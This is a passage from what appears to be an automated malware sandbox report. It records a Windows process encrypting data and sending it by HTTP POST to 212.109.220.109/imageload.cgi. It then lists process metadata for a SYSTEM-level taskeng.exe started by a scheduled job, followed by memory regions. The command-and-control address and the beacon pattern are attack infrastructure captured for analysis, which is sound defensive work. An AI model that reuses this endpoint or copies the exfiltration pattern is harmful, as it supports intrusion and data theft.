pbData=0x281fbad, pdwDataLen=0x281fc9c, dwFlags=0x0 | out: pbData=0x281fbad, pdwDataLen=0x281fc9c) returned 1 [0111.171] CryptEncrypt (in: hKey=0x5f2330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281fb8c*, pdwDataLen=0x281f8d8*=0x35, dwBufLen=0x80 | out: pbData=0x281fb8c*, pdwDataLen=0x281f8d8*=0x80) returned 1 [0111.171] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f8c4 | out: pbBuffer=0x281f8c4) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f8c4 | out: pbBuffer=0x281f8c4) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f8c4 | out: pbBuffer=0x281f8c4) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f8c4 | out: pbBuffer=0x281f8c4) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f8c4 | out: pbBuffer=0x281f8c4) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f8c4 | out: pbBuffer=0x281f8c4) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f8c4 | out: pbBuffer=0x281f8c4) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.172] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f8c4 | out: pbBuffer=0x281f8c4) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f8c4 | out: pbBuffer=0x281f8c4) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f8c4 | out: pbBuffer=0x281f8c4) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f8c4 | out: pbBuffer=0x281f8c4) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f8c4 | out: pbBuffer=0x281f8c4) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x281f804 | out: pbBuffer=0x281f804) returned 1 [0111.173] InternetCrackUrlA (in: lpszUrl="http://212.109.220.109/imageload.cgi", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x281eaac | out: lpUrlComponents=0x281eaac) returned 1 [0111.173] InternetConnectA (hInternet=0xcc0004, lpszServerName="212.109.220.109", nServerPort=0x50, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0111.173] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/imageload.cgi", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x844c0300, dwContext=0x0) returned 0xcc000c [0111.173] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x4d, lpBuffer=0x0, dwBufferLength=0x0) returned 1 [0111.173] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: */*\r\nAccept-Language: en-us\r\nReferer: http://212.109.220.109/\r\nx-requested-with: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache", dwHeadersLength=0xd1, dwModifiers=0xa0000000) returned 1 [0111.173] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x28ac238*, dwOptionalLength=0x36a | out: lpOptional=0x28ac238*) returned 1 [0111.895] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x281ea9c, lpdwBufferLength=0x281ea84, lpdwIndex=0x0 | out: lpBuffer=0x281ea9c*, lpdwBufferLength=0x281ea84*=0x4, lpdwIndex=0x0) returned 1 [0111.895] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x281ea9c, lpdwBufferLength=0x281ea84, lpdwIndex=0x0 | out: lpBuffer=0x281ea9c*, lpdwBufferLength=0x281ea84*=0x4, lpdwIndex=0x0) returned 1 [0111.895] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x28abb70, dwNumberOfBytesToRead=0x114, lpdwNumberOfBytesRead=0x281ea98 | out: lpBuffer=0x28abb70*, lpdwNumberOfBytesRead=0x281ea98*=0x114) returned 1 [0111.895] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0111.897] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0111.898] CryptHashData (hHash=0x5fc1d8, pbData=0x28abb70, dwDataLen=0x100, dwFlags=0x0) returned 1 [0111.898] CryptGetHashParam (in: hHash=0x5fc1d8, dwParam=0x2, pbData=0x281f854, pdwDataLen=0x281f8d4, dwFlags=0x0 | out: pbData=0x281f854, pdwDataLen=0x281f8d4) returned 1 [0111.898] CryptDestroyHash (hHash=0x5fc1d8) returned 1 [0111.898] CryptDestroyKey (hKey=0x5fc358) returned 1 [0111.898] CryptDestroyHash (hHash=0x5fc318) returned 1 [0111.898] CryptDestroyKey (hKey=0x5fc2d8) returned 1 [0111.898] CryptDestroyKey (hKey=0x5fc258) returned 1 [0111.898] CryptReleaseContext (hProv=0x606b98, dwFlags=0x0) returned 1 Thread: id = 58 os_tid = 0x8d0 Thread: id = 60 os_tid = 0x900 Thread: id = 90 os_tid = 0x9e4 Thread: id = 92 os_tid = 0xacc Process: id = "3" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x7000a000" os_pid = "0x728" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_scheduled_job" parent_id = "2" os_parent_pid = "0xb68" cmd_line = "taskeng.exe {4E22B586-9520-4D04-A683-CAB40E860F60} S-1-5-18:NT AUTHORITY\\System:Service:" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000be5d" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2288 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2289 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2290 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2291 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2292 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2293 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2294 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2295 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2296 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2297 start_va = 0x170000 end_va = 0x22ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 2298 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 2299 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 2300 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 2301 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2302 start_va = 0x470000 end_va = 0x5f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 2303 start_va = 0x600000 end_va = 0x780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2304 start_va = 0x790000 end_va = 0xb82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2305 start_va = 0xb90000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 2306 start_va = 0xcb0000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 2307 start_va = 0xd60000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 2308 start_va = 0xe90000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 2309 start_va = 0xff0000 end_va = 0x12befff entry_point = 0xff0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2310 start_va = 0x1300000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 2311 start_va = 0x1520000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 2312 start_va = 0x15a0000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 2313 start_va = 0x76fb0000 end_va = 0x770a9fff entry_point = 0x76fca2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2314 start_va = 0x770b0000 end_va = 0x771cefff entry_point = 0x770c5ea0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2315 start_va = 0x771d0000 end_va = 0x77378fff entry_point = 0x771d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2316 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2317 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2318 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2319 start_va = 0xffd10000 end_va = 0xffd83fff entry_point = 0xffd1f44c region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 2320 start_va = 0x7fef4b40000 end_va = 0x7fef4b48fff entry_point = 0x7fef4b411a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 2321 start_va = 0x7fefa960000 end_va = 0x7fefa969fff entry_point = 0x7fefa96260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 2322 start_va = 0x7fefb5d0000 end_va = 0x7fefb604fff entry_point = 0x7fefb5d1064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2323 start_va = 0x7fefc710000 end_va = 0x7fefc756fff entry_point = 0x7fefc711064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2324 start_va = 0x7fefca10000 end_va = 0x7fefca26fff entry_point = 0x7fefca132b8 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2325 start_va = 0x7fefcc00000 end_va = 0x7fefcc6cfff entry_point = 0x7fefcc01010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2326 start_va = 0x7fefcfe0000 end_va = 0x7fefd004fff entry_point = 0x7fefcfe9658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2327 start_va = 0x7fefd010000 end_va = 0x7fefd01efff entry_point = 0x7fefd011010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2328 start_va = 0x7fefd100000 end_va = 0x7fefd113fff entry_point = 0x7fefd1010e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2329 start_va = 0x7fefd2b0000 end_va = 0x7fefd31afff entry_point = 0x7fefd2b30e0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2330 start_va = 0x7fefd550000 end_va = 0x7fefd618fff entry_point = 0x7fefd5ca874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2331 start_va = 0x7fefd620000 end_va = 0x7fefd6f6fff entry_point = 0x7fefd623274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2332 start_va = 0x7fefd700000 end_va = 0x7fefd7dafff entry_point = 0x7fefd720760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2333 start_va = 0x7fefdbb0000 end_va = 0x7fefdbddfff entry_point = 0x7fefdbb1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2334 start_va = 0x7fefde40000 end_va = 0x7fefe042fff entry_point = 0x7fefde63330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2335 start_va = 0x7fefe220000 end_va = 0x7fefe2b8fff entry_point = 0x7fefe221c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2336 start_va = 0x7fefe2c0000 end_va = 0x7fefe2defff entry_point = 0x7fefe2c60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2337 start_va = 0x7fefe2e0000 end_va = 0x7fefe3e8fff entry_point = 0x7fefe2e1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2338 start_va = 0x7fefe3f0000 end_va = 0x7fefe51cfff entry_point = 0x7fefe43ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2339 start_va = 0x7fefe520000 end_va = 0x7fefe5befff entry_point = 0x7fefe5225a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2340 start_va = 0x7fefe5d0000 end_va = 0x7fefe636fff entry_point = 0x7fefe5db03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2341 start_va = 0x7fefe640000 end_va = 0x7fefe64dfff entry_point = 0x7fefe641080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2342 start_va = 0x7fefe6d0000 end_va = 0x7fefe740fff entry_point = 0x7fefe6e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2343 start_va = 0x7feff4f0000 end_va = 0x7feff4f0fff entry_point = 0x7feff4f0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2344 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2345 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2346 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2347 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2348 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2349 start_va = 0x7fffffda000 